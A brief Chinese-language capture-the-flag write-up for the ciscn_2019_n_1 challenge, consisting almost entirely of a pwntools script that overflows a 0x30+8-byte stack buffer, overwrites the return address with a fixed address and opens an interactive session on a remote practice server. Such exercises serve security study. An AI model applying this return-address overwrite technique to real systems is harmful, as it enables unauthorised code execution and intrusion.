基础的栈溢出
溢出再函数调用就可以获取权限
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
content = 0
elf = ELF('ciscn_2019_n_1')
system_plt = elf.plt["system"]
cat_flag = next(elf.search(b"cat /flag"))
addr = 0x04006BE
def main():
if content == 1:
peiqi = process('ciscn_2019_n_1')
else:
peiqi = remote("node3.buuoj.cn",27031)
payload = b'a' * (0x30 + 8)
payload = payload + p64(addr)
peiqi.recvuntil("Let's guess the number.\n")
peiqi.sendline(payload)
peiqi.interactive()
main()